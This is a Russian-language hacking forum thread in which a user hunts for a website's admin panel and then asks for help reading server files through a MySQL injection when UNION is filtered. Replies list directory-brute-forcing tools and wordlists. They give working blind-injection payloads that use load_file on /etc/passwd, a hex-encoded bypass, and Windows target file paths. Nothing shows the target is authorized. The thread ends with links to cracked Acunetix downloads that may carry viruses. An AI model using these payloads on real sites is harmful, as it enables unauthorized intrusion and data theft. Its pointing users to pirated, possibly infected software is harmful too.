Привет всем. Нужна помощь в поиске админки. Искал 2мя тулзами но результата 0.

Подскажите онлайн ресурс какой или софт, или может приватно кто-нибудь поможет?

кидай посмотрю

nikto

dirb

dirs3arch

dnsmap (поддомены)

+ fuzz.txt https://bo0om.ru/fuzz.txt

+ listpath.txt https://yarbabin.ru/stuff/listpath.txt

Может быть такое, что получить удалённый доступ к админке невозможно?

Да, если, например, доступ разрешен только с определенных ip\диапазонов ip, либо по специальному user-агенту, и.т.д. Точнее получить-то его возможно, но весьма затруднительно.

А где можно почитать про такие случаи поподробнее? Хочу доделать то что начал до конца)

И ещё вопрос (сори что не по теме) можно ли провести проверку на чтение/запись файлов через MySql Inj, если стоит фильтр на UNION (Все известные мне способы обхода фильтра я, естественно, попробовал).

and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+

Тоесть если есть возможность загрузки то при:

site.ru/index.php?id=1 and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+

Выведет то же самое что и при:

site.ru/index.php?id=1

Я правильно понимаю?

Чёт нифига не правильно

is NULL и is not NULL - во втором случае получите TRUE, если есть права

Проверяю данные запросы в консоли

SELECT 1 AND 1=if(load_file('/etc/passwd') is not NULL,1,2); Возвращает 1.

SELECT 1 AND 1=if(load_file('/etc/passwd') is NULL,1,2); Возвращает 0.

Но когда подставляю на сайте что в первом, что во втором случае отображается то же самое, что и при: site.ru/index.php?id=1

Но если делаю так: site.ru/index.php?id=1 and 1=0--+

Возвращает пустую страницу.

Это значит что нет прав на загрузку файла?

Может я что-то делаю не так?=\

может что-то не так. может кавычки у вас экранируются, может /etc/passwd блокирует WAF, или еще что-то. но результаты при этих запросах должны отличатся вне зависимости от того, есть права или нет.

Теперь такой запроc: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ Возвращает пустую страницу.

Может сервер на винде...

yarbabin,Спасибо огромное за помощь буду дальше пытаться ковырять

и толку что вы спрятали слово в кавычках в хекс и анхекс? load_file(0x2f6574632f706173737764)

Но теперь хотя бы есть результат)

При таком запросе: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is NULL,1,2)--+ отображается как и при site.ru/index.php?id=1

а при AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ пустая страница.

То же самое и при and 1=if(load_file(0x2f6574632f706173737764) is not NULL,1,2)--+

и

and 1=if(load_file(0x2f6574632f706173737764) is NULL,1,2)--+

просто под рукой сейчас нчего нет что в хекс кодирует строку)

and 1=1 TRUE

and 1=2 FALSE

Соответственно, load_file(unhex(hex('/etc/passwd')) возвращает null, у вас нет прав на чтение.

Это я понял. Просто думаю если серв на винде то путь другой будет. Сейчас времени нет тестить (не дома нахожусь).

Под вендой в консоли при запросе select 1 and 1=if(load_file('/etc/passwd') is not NULL,1,2); вернётся false так как такого пути не существует.

C:\boot.ini

C:\Windows\System32\drivers\etc\hosts

Короче нет там прав на чтение. Всем спасибо. Пойду думать дальше.

Aqunetix - клёвый софт для этого. Но бывает сайту тупо состоит из набора html статических страниц и там просто нет админики )))

Acunetix он пишется https://www.acunetix.com/

Можно ссылочку на фулл версию?)

Держи http://rutracker.org/forum/viewtopic.php?t=4930387

Последняя версия http://www.52pojie.cn/thread-377625-1-1.html ИЛИ http://mytestvps.com/wordpress/acune...-download.html ИЛИ http://www.freebuf.com/tools/71091.html - я не проверял возможно есть вирусы...